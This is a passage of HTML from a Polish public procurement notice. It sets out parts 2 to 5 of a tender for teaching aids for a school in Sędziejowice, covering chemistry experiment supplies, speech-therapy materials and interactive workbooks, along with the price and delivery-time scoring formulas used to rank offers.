class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2 zamówienia - przedmiotem zamówienia jest dostawa pomocy dydaktycznych do realizacji eksperymentów do realizatora projektu Zespołu Szkół Ogólnokształcących Nr 1 im. Powstańców 1863r. w Sędziejowicach, ul. Powstańców 1863 r. nr 6, 98 – 160 Sędziejowice. Wszystkie materiały stanowiące przedmiot zamówienia muszą być oryginalne, profesjonalne i fabrycznie nowe, wysokiej jakości, sprawne, wolne od jakichkolwiek wad fizycznych, jak również od jakichkolwiek wad prawnych i roszczeń osób trzecich, nie używane, nie powystawowe, nie regenerowane. Pod pojęciem fabrycznie nowe Zamawiający rozumie produkty wykonane z nowych elementów, bez śladu uszkodzenia, w oryginalnych opakowaniach producenta, z widocznym logo, symbolem produktu. Dostarczone materiały muszą być zgodnie z obowiązującymi normami i posiadać wymagane atesty, certyfikaty, aprobaty techniczne, deklaracje zgodności, świadectwa bezpieczeństwa, homologacje, licencje itp.<br/>Elementy zestawu:<br/>1. Proszek do pieczenia 20 opakowań,<br/>2. Kwasek cytrynowy 20 opakowań,<br/>3. Zapałki 100 pudełek,<br/>4. Mydło w płynie 20 sztuk, 250 ml,<br/>5. Perhydrol 5 litrów,<br/>6. Nadmanganian potasu proszek 1 kg,<br/>7. Bagietki do mieszania 30 sztuk 5 x 300mm,<br/>8. Probówki 50 sztuk,<br/>9. Kolba stożkowa 1000 ml,<br/>10. Kolba stożkowa 250 ml 3 sztuki,<br/>11. Kolba stożkowa 500 ml 2 sztuki,<br/>12. Papierki wskaźnikowe pH 0-12 (100szt),<br/>13. Probówka szklana 15/16/160 mm z korkiem,<br/>14. Probówka szklana śr.11/12/100 mm,<br/>15. Nadmanganian potasu tabletki 100mg (30szt),<br/>16. Butelki na roztwory (szklane) 5 sztuk. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39162100-6 - Pomoce dydaktyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39162000-5 - Pomoce naukowe</p> <p class="mb-0">39162110-9 - Sprzęt dydaktyczny</p> <p class="mb-0">37000000-8 - Instrumenty muzyczne, artykuły sportowe, gry, zabawki, wyroby rzemieślnicze, materiały i akcesoria artystyczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający będzie stosować następujące kryteria oceny ofert:<br/>	Cena – 60%,<br/>	Termin realizacji dostawy – 40%.<br/><br/>2. Punkty przyznane w ramach kryterium „Cena” (C) zostaną obliczone według wzoru:<br/>C=C_min/C_b ×60pkt<br/>gdzie:<br/>	C – liczba punktów, którą uzyskała badana oferta w kryterium „Cena”,<br/>	Cmin – cena (cena ofertowa brutto w ramach poszczególnych zadań) najtańszej oferty spośród ofert nieodrzuconych,<br/>	Cb – cena (cena ofertowa brutto) badanej oferty spośród ofert nieodrzuconych.<br/>Maksymalnie można uzyskać 60 punktów. Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/><br/>3. Punkty przyznane w ramach kryterium „Termin realizacji dostawy” (D) zostaną przyznane według wzoru:<br/>D=D_min/D_z ×40pkt<br/>gdzie:<br/>	D – liczba punktów, którą uzyskała badana oferta w kryterium „Termin realizacji dostawy”,<br/>	Dz – termin realizacji dostawy zadeklarowany w ocenianej ofercie,<br/>	Dmin – najkrótszy termin realizacji dostawy spośród nieodrzuconych ofert.<br/>W tym kryterium można uzyskać maksymalnie 40 punktów Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/>UWAGA:<br/>	Najkrótszy możliwy termin realizacji dostawy wymagany przez Zamawiającego: 7 dni od daty podpisania umowy.<br/>	Najdłuższy możliwy termin realizacji dostawy: 21 dni od daty podpisania umowy.<br/>	Wykonawca może zaproponować termin realizacji dostawy w przedziale od 7 do 21 dni od daty podpisania umowy. Zaoferowany przez Wykonawcę termin realizacji dostawy zostanie uwzględniony w umowie.<br/>	Wykonawca, który zaoferuje najkorzystniejszy termin realizacji dostawy (7 dni od daty podpisania umowy) otrzyma maksymalną ilość punktów – 40 punktów.<br/>	Wykonawca, który zaoferuje termin realizacji dostawy w ciągu 21 dni od daty podpisania umowy - otrzymuje 0 pkt.<br/>	Pozostali Wykonawcy (tj. Wykonawcy, którzy zaproponowali wartość pośrednią, pomiędzy wartością najkorzystniejszą a najmniej korzystną), otrzymują liczbę punktów (D) obliczoną wg powyższego wzoru.<br/><br/>4. Za najkorzystniejszą zostanie uznana oferta, która uzyska łącznie największą liczbę punktów (P) wyliczona zgodnie z poniższym wzorem:<br/>P=C+D<br/>	gdzie:<br/>	P – łączna liczba punktów ocenianej oferty,<br/>	C – liczba punktów uzyskanych w ramach kryterium „Cena”,<br/>	D – liczba punktów uzyskanych w ramach kryterium „Termin realizacji dostawy”,<br/>5. Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiada wszystkim wymaganiom określonym w ustawie i w SWZ oraz została oceniona jako najkorzystniejsza, czyli uzyskała najwyższą ilość punktów w określonych powyżej kryteriach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 3 zamówienia - przedmiotem zamówienia jest dostawa pomocy dydaktycznych do realizacji zajęć logopedycznych do realizatora projektu Zespołu Szkół Ogólnokształcących Nr 1 im. Powstańców 1863r. w Sędziejowicach, ul. Powstańców 1863 r. nr 6, 98 – 160 Sędziejowice. Wszystkie materiały stanowiące przedmiot zamówienia muszą być oryginalne, profesjonalne i fabrycznie nowe, wysokiej jakości, sprawne, wolne od jakichkolwiek wad fizycznych, jak również od jakichkolwiek wad prawnych i roszczeń osób trzecich, nie używane, nie powystawowe, nie regenerowane. Pod pojęciem fabrycznie nowe Zamawiający rozumie produkty wykonane z nowych elementów, bez śladu uszkodzenia, w oryginalnych opakowaniach producenta, z widocznym logo, symbolem produktu. Dostarczone materiały muszą być zgodnie z obowiązującymi normami i posiadać wymagane atesty, certyfikaty, aprobaty techniczne, deklaracje zgodności, świadectwa bezpieczeństwa, homologacje, licencje itp.<br/>Elementy zestawu:<br/>1.	Szeregi i relacje - Symultaniczne i sekwencyjne strategie uczenia się - 1szt,<br/>2.	Logopedyczne zabawy. Część I – sz, ż, cz, dż - 1 szt.,<br/>3.	EduSensus Logopedia PRO - Mówiące obrazki - 1szt,<br/>4.	Czarne czy białe? 1 szt, skład: 16 dwustronnych elementów tekturowych, 55 pasków wzorcowych, książeczka, 45 stron laminowanych ze wzorami, instrukcja ćwiczeń, pudełko tekturowe </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39162100-6 - Pomoce dydaktyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39162110-9 - Sprzęt dydaktyczny</p> <p class="mb-0">39162000-5 - Pomoce naukowe</p> <p class="mb-0">37000000-8 - Instrumenty muzyczne, artykuły sportowe, gry, zabawki, wyroby rzemieślnicze, materiały i akcesoria artystyczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający będzie stosować następujące kryteria oceny ofert:<br/>	Cena – 60%,<br/>	Termin realizacji dostawy – 40%.<br/><br/>2. Punkty przyznane w ramach kryterium „Cena” (C) zostaną obliczone według wzoru:<br/>C=C_min/C_b ×60pkt<br/>gdzie:<br/>	C – liczba punktów, którą uzyskała badana oferta w kryterium „Cena”,<br/>	Cmin – cena (cena ofertowa brutto w ramach poszczególnych zadań) najtańszej oferty spośród ofert nieodrzuconych,<br/>	Cb – cena (cena ofertowa brutto) badanej oferty spośród ofert nieodrzuconych.<br/>Maksymalnie można uzyskać 60 punktów. Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/><br/>3. Punkty przyznane w ramach kryterium „Termin realizacji dostawy” (D) zostaną przyznane według wzoru:<br/>D=D_min/D_z ×40pkt<br/>gdzie:<br/>	D – liczba punktów, którą uzyskała badana oferta w kryterium „Termin realizacji dostawy”,<br/>	Dz – termin realizacji dostawy zadeklarowany w ocenianej ofercie,<br/>	Dmin – najkrótszy termin realizacji dostawy spośród nieodrzuconych ofert.<br/>W tym kryterium można uzyskać maksymalnie 40 punktów Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/>UWAGA:<br/>	Najkrótszy możliwy termin realizacji dostawy wymagany przez Zamawiającego: 7 dni od daty podpisania umowy.<br/>	Najdłuższy możliwy termin realizacji dostawy: 21 dni od daty podpisania umowy.<br/>	Wykonawca może zaproponować termin realizacji dostawy w przedziale od 7 do 21 dni od daty podpisania umowy. Zaoferowany przez Wykonawcę termin realizacji dostawy zostanie uwzględniony w umowie.<br/>	Wykonawca, który zaoferuje najkorzystniejszy termin realizacji dostawy (7 dni od daty podpisania umowy) otrzyma maksymalną ilość punktów – 40 punktów.<br/>	Wykonawca, który zaoferuje termin realizacji dostawy w ciągu 21 dni od daty podpisania umowy - otrzymuje 0 pkt.<br/>	Pozostali Wykonawcy (tj. Wykonawcy, którzy zaproponowali wartość pośrednią, pomiędzy wartością najkorzystniejszą a najmniej korzystną), otrzymują liczbę punktów (D) obliczoną wg powyższego wzoru.<br/><br/>4. Za najkorzystniejszą zostanie uznana oferta, która uzyska łącznie największą liczbę punktów (P) wyliczona zgodnie z poniższym wzorem:<br/>P=C+D<br/>	gdzie:<br/>	P – łączna liczba punktów ocenianej oferty,<br/>	C – liczba punktów uzyskanych w ramach kryterium „Cena”,<br/>	D – liczba punktów uzyskanych w ramach kryterium „Termin realizacji dostawy”,<br/>5. Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiada wszystkim wymaganiom określonym w ustawie i w SWZ oraz została oceniona jako najkorzystniejsza, czyli uzyskała najwyższą ilość punktów w określonych powyżej kryteriach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 4 zamówienia - przedmiotem zamówienia jest dostawa 120 kompletów pomocy dydaktycznych do realizacji zajęć rozwijających kompetencje społeczno-emocjonalne do realizatora projektu Zespołu Szkół Ogólnokształcących Nr 1 im. Powstańców 1863r. w Sędziejowicach, ul. Powstańców 1863 r. nr 6, 98 – 160 Sędziejowice. Wszystkie materiały stanowiące przedmiot zamówienia muszą być oryginalne, profesjonalne i fabrycznie nowe, wysokiej jakości, sprawne, wolne od jakichkolwiek wad fizycznych, jak również od jakichkolwiek wad prawnych i roszczeń osób trzecich, nie używane, nie powystawowe, nie regenerowane.<br/>Elementy zestawu dydaktycznego:<br/>1.	Księga do wklejania kart pracy. Format A4, okładka sztywna kolor, szycie zeszytowe lub klejone. Księga będzie służyć do wklejania kart pracy. Jej środek musi więc zawierać puste kartki o gramaturze papieru nie niższej niż 90. Tajemnicza księga powinna mieć zadrukowane ( nie naklejone) logotypy zgodnie z promocją projektu;<br/>2.	Karty pracy INTERAKTYWNE mówiące 64 sztuki przeznaczone do pracy indywidualnej. Format kart pracy A4, druk kolor, gramatura papieru nie niższa niż 90. Tematyka: karty rozwijające pozytywne myślenie, wiarę we własne możliwości, wyrażanie potrzeb i odczuć, wyrażanie emocji, rozwijające wyobraźnię oraz wiedzę o otaczającym świecie. Część kart powinna zawierać interaktywność (e-pomoc edukacyjna) po dotknięciu przez zewnętrzne urządzenie zadania, elementy z kart powinny być odczytywane przez zewnętrzny długopis. Specyfikacja interaktywności: na kartach będą umieszczone koła z zadrukowanymi (nie naklejonymi) kodami optycznymi. Karty pracy powinny mieć zadrukowane (nie naklejone) logotypy zgodnie z promocją projektu;<br/>3.	Książki ćwiczeń 4 sztuki: rozwijające umiejętności komunikacyjne -rozpoznawanie i kierowanie swoimi emocjami; budowanie dobrych relacji z innymi; ograniczanie destrukcyjnych czy agresywnych zachowań druk kolor, format A5, okładka min. 250 gram, liczba stron w każdej książeczce minimum 12;<br/>4.	Książka ćwiczeń rozwijająca zainteresowania, mocne strony u dzieci, osiąganie celów, rozwiązywanie problemów i konfliktów: Druk kolor, format A4, okładka min.350 gr ,foliowana, liczba stron minimum 16. Książka powinna zawierać interaktywność: <br/>(e-pomoc edukacyjna) po dotknięciu przez zewnętrzne urządzenie zadania powinny być odczytywane. Specyfikacja interaktywności: na kartach będą umieszczone koła z zadrukowanymi ( nie naklejonymi) kodami optycznymi. Kody powinny być zadrukowane na każdej stronie ze zdaniami.<br/>5.	Teczka na materiały, druk kolor, zawierająca zadrukowane logotypy, druk kolor. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39162100-6 - Pomoce dydaktyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39162000-5 - Pomoce naukowe</p> <p class="mb-0">39162110-9 - Sprzęt dydaktyczny</p> <p class="mb-0">37000000-8 - Instrumenty muzyczne, artykuły sportowe, gry, zabawki, wyroby rzemieślnicze, materiały i akcesoria artystyczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający będzie stosować następujące kryteria oceny ofert:<br/>	Cena – 60%,<br/>	Termin realizacji dostawy – 40%.<br/><br/>2. Punkty przyznane w ramach kryterium „Cena” (C) zostaną obliczone według wzoru:<br/>C=C_min/C_b ×60pkt<br/>gdzie:<br/>	C – liczba punktów, którą uzyskała badana oferta w kryterium „Cena”,<br/>	Cmin – cena (cena ofertowa brutto w ramach poszczególnych zadań) najtańszej oferty spośród ofert nieodrzuconych,<br/>	Cb – cena (cena ofertowa brutto) badanej oferty spośród ofert nieodrzuconych.<br/>Maksymalnie można uzyskać 60 punktów. Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/><br/>3. Punkty przyznane w ramach kryterium „Termin realizacji dostawy” (D) zostaną przyznane według wzoru:<br/>D=D_min/D_z ×40pkt<br/>gdzie:<br/>	D – liczba punktów, którą uzyskała badana oferta w kryterium „Termin realizacji dostawy”,<br/>	Dz – termin realizacji dostawy zadeklarowany w ocenianej ofercie,<br/>	Dmin – najkrótszy termin realizacji dostawy spośród nieodrzuconych ofert.<br/>W tym kryterium można uzyskać maksymalnie 40 punktów Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/>UWAGA:<br/>	Najkrótszy możliwy termin realizacji dostawy wymagany przez Zamawiającego: 7 dni od daty podpisania umowy.<br/>	Najdłuższy możliwy termin realizacji dostawy: 21 dni od daty podpisania umowy.<br/>	Wykonawca może zaproponować termin realizacji dostawy w przedziale od 7 do 21 dni od daty podpisania umowy. Zaoferowany przez Wykonawcę termin realizacji dostawy zostanie uwzględniony w umowie.<br/>	Wykonawca, który zaoferuje najkorzystniejszy termin realizacji dostawy (7 dni od daty podpisania umowy) otrzyma maksymalną ilość punktów – 40 punktów.<br/>	Wykonawca, który zaoferuje termin realizacji dostawy w ciągu 21 dni od daty podpisania umowy - otrzymuje 0 pkt.<br/>	Pozostali Wykonawcy (tj. Wykonawcy, którzy zaproponowali wartość pośrednią, pomiędzy wartością najkorzystniejszą a najmniej korzystną), otrzymują liczbę punktów (D) obliczoną wg powyższego wzoru.<br/><br/>4. Za najkorzystniejszą zostanie uznana oferta, która uzyska łącznie największą liczbę punktów (P) wyliczona zgodnie z poniższym wzorem:<br/>P=C+D<br/>	gdzie:<br/>	P – łączna liczba punktów ocenianej oferty,<br/>	C – liczba punktów uzyskanych w ramach kryterium „Cena”,<br/>	D – liczba punktów uzyskanych w ramach kryterium „Termin realizacji dostawy”,<br/>5. Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiada wszystkim wymaganiom określonym w ustawie i w SWZ oraz została oceniona jako najkorzystniejsza, czyli uzyskała najwyższą ilość punktów w określonych powyżej kryteriach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 5 zamówienia - przedmiotem zamówienia jest dostawa pomocy dydaktycznych do realizacji zajęć rozwijających kompetencje kluczowe do realizatora projektu Zespołu Szkół Ogólnokształcących Nr 1 im. Powstańców 1863r. w Sędziejowicach, ul. Powstańców 1863 r. nr 6, 98 – 160 Sędziejowice. Wszystkie materiały stanowiące przedmiot zamówienia muszą być oryginalne, profesjonalne i fabrycznie nowe, wysokiej jakości, sprawne, wolne od jakichkolwiek wad fizycznych, jak również od jakichkolwiek wad prawnych i roszczeń osób trzecich, nie używane, nie powystawowe, nie regenerowane.<br/>Zestawy edukacyjne 120 kompletów. Elementy zestawu:<br/>1. Tajemnicza księga do wklejania kart pracy format A4 szt. 1. Format A4, okładka sztywna kolor, szycie zeszytowe lub klejone. Księga będzie służyć do wklejania kart pracy. <br/>Jej środek musi więc zawierać puste kartki o gramaturze papieru nie niższej niż 90. Tajemnicza księga powinna mieć zadrukowane (nie naklejone) logotypy zgodnie <br/>z promocją projektu,<br/>2. Karty pracy INTERAKTYWNE mówiące 64 szt. - przeznaczone do pracy indywidualnej. Format kart pracy A4, druk kolor, gramatura papieru nie niższa niż 90. Tematyka: karty poprawiające zdolności uczenia się: zawierające techniki pamięciowe, kreatywne notowanie, podnoszące międzykulturową wrażliwość poprzez podróżnicze tematy zajęć, wzrost poziomu uwagi, wzrost poziomu koncentracji, wzrost poziomu eks- presji twórczej, rozwój myślenia krytycznego i analitycznego. Cześć kart powinna zawierać interaktywność (e-pomoc edukacyjna) po do- tknięciu przez zewnętrzne urządzenie zadania, elementy <br/>z kart powinny być odczytywane. Specyfikacja interaktywności: na kartach będą umieszczone koła z zadrukowanymi (nie naklejonymi) kodami optycznymi. Karty pracy powinny mieć zadrukowane (nie naklejone) logotypy zgodnie z promocją projektu,<br/>3.	Książeczki ćwiczeń do stymulacji wyrazowej- interaktywne, mówiące, 4 sztuki- przeznaczone do pracy indywidualnej oraz utrwalania w domu wprowadzanych wyrazów. Druk kolor, format A5, szycie zeszytowe, okładka gramatura min 250, środek gramatura min 90. Tematyka: zdania do odczytu i piktogramy obrazujące zdania. Każda książeczka powinna zawierać interaktywność: (e-pomoc edukacyjna) po dotknięciu przez zewnętrzne urządzenie zadania powinny być odczytywane. Specyfikacja interaktywności: na kartach będą umieszczone koła z zadrukowanymi (nie naklejonymi) kodami optycznymi. Kody powinny być zadrukowane na każdej stronie ze zdaniami. Ilość stron w każdej książeczce: minimum 10. Książeczki powinny mieć zadrukowane (nie naklejone) logotypy zgodnie <br/>z promocją projektu,<br/>4.	Książka ćwiczeniowa poszerzająca pamięć- zawierająca techniki pamięciowe oraz ćwiczenia z zakresu notowania nielinearnego. Druk kolor, format A4, okładka minimum 300. Ilość stron minimum 13. Książka powinna zawierać interaktywność: (e-pomoc edukacyjna) po dotknięciu przez zewnętrzne urządzenie zadania powinny być odczytywane. Specyfikacja interaktywności: Na kartach dotyczących notowania nielinearnego będą umieszczone koła z zadrukowanymi (nie naklejonymi) kodami optycznymi. Kody powinny być zadrukowane na każdej stronie gdzie jest mapa <br/>do notowania w centrum tej mapy. Książka powinna zawierać kartkę z naklejkami dociętymi laserowo (tematycznie połączonych z mapami do notowania nielinearnego),<br/>5.	Teczka - druk kolor, zawierająca logotypy, mieszcząca wszystkie materiały Tablice wielkoformatowe sztuk 8<br/>6.	Tablica wielkoformatowa szt. 2 do rozwoju kreatywności, format 90 na 120 cm, druk kolor, oprawa metalowa, logotypy zadrukowane, zawierająca minimum 35 kwadratów <br/>z zadrukowanymi literami alfabetu i cyframi, tablica umożliwiająca wielokrotne zapisywanie i ścieranie treści,<br/>7.	Tablica wielkoformatowej do technik pamięciowych 2 szt., format 90 na 120 cm, druk kolor, oprawa metalowa, logotypy zadrukowane, zawierająca minimum 22 kolorowe kwadraty do naklejania tabliczek magnetycznych, tablica umożliwiająca wielokrotne zapisywanie i ścieranie treści,<br/>8.	Tablicy wielkoformatowa do technik pamięciowych: zakładki osobiste 2 sztuki, format 90 na 120 cm, druk kolor, oprawa metalowa, logotypy zadrukowane, zawierająca minimum postać ludzką/ postać zwierzęcą i zaznaczenie minimum 6 części ciała, 30 tabliczek magnetycznej for- matu minimum A8 ze zwierzętami i produktami spożywczymi, tabliczki kaszerowane, magnes z tyłu tabliczki rozmieszczony na całości tabliczki trwale przyklejony do tabliczki, tablica umożliwiająca wielokrotne zapisywanie i ścieranie treści,<br/>9.	Tablica wielkoformatowa do map myśli 2 szt., format 90 na 120 cm, druk kolor, oprawa metalowa, logotypy zadrukowane, zawierająca mapę myśli i minimum 32 kolorowe gałęzie główne, tablica umożliwiająca wielokrotne zapisywanie i ścieranie treści. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39162100-6 - Pomoce dydaktyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39162000-5 - Pomoce naukowe</p> <p class="mb-0">39162110-9 - Sprzęt dydaktyczny</p> <p class="mb-0">37000000-8 - Instrumenty muzyczne, artykuły sportowe, gry, zabawki, wyroby rzemieślnicze, materiały i akcesoria artystyczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający będzie stosować następujące kryteria oceny ofert:<br/>	Cena – 60%,<br/>	Termin realizacji dostawy – 40%.<br/><br/>2. Punkty przyznane w ramach kryterium „Cena” (C) zostaną obliczone według wzoru:<br/>C=C_min/C_b ×60pkt<br/>gdzie:<br/>	C – liczba punktów, którą uzyskała badana oferta w kryterium „Cena”,<br/>	Cmin – cena (cena ofertowa brutto w ramach poszczególnych zadań) najtańszej oferty spośród ofert nieodrzuconych,<br/>	Cb – cena (cena ofertowa brutto) badanej oferty spośród ofert nieodrzuconych.<br/>Maksymalnie można uzyskać 60 punktów. Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/><br/>3. Punkty przyznane w ramach kryterium „Termin realizacji dostawy” (D) zostaną przyznane według wzoru:<br/>D=D_min/D_z ×40pkt<br/>gdzie:<br/>	D – liczba punktów, którą uzyskała badana oferta w kryterium „Termin realizacji dostawy”,<br/>	Dz – termin realizacji dostawy zadeklarowany w ocenianej ofercie,<br/>	Dmin – najkrótszy termin realizacji dostawy spośród nieodrzuconych ofert.<br/>W tym kryterium można uzyskać maksymalnie 40 punktów Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/>UWAGA:<br/>	Najkrótszy możliwy termin realizacji dostawy wymagany przez Zamawiającego: 7 dni od daty podpisania umowy.<br/>	Najdłuższy możliwy termin realizacji dostawy: 21 dni od daty podpisania umowy.<br/>	Wykonawca może zaproponować termin realizacji dostawy w przedziale od 7 do 21 dni od daty podpisania umowy. Zaoferowany przez Wykonawcę termin realizacji dostawy zostanie uwzględniony w umowie.<br/>	Wykonawca, który zaoferuje najkorzystniejszy termin realizacji dostawy (7 dni od daty podpisania umowy) otrzyma maksymalną ilość punktów – 40 punktów.<br/>	Wykonawca, który zaoferuje termin realizacji dostawy w ciągu 21 dni od daty podpisania umowy - otrzymuje 0 pkt.<br/>	Pozostali Wykonawcy (tj. Wykonawcy, którzy zaproponowali wartość pośrednią, pomiędzy wartością najkorzystniejszą a najmniej korzystną), otrzymują liczbę punktów (D) obliczoną wg powyższego wzoru.<br/><br/>4. Za najkorzystniejszą zostanie uznana oferta, która uzyska łącznie największą liczbę punktów (P) wyliczona zgodnie z poniższym wzorem:<br/>P=C+D<br/>	gdzie:<br/>	P – łączna liczba punktów ocenianej oferty,<br/>	C – liczba punktów uzyskanych w ramach kryterium „Cena”,<br/>	D – liczba punktów uzyskanych w ramach kryterium „Termin realizacji dostawy”,<br/>5. Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiada wszystkim wymaganiom określonym w ustawie i w SWZ oraz została oceniona jako najkorzystniejsza, czyli uzyskała najwyższą ilość 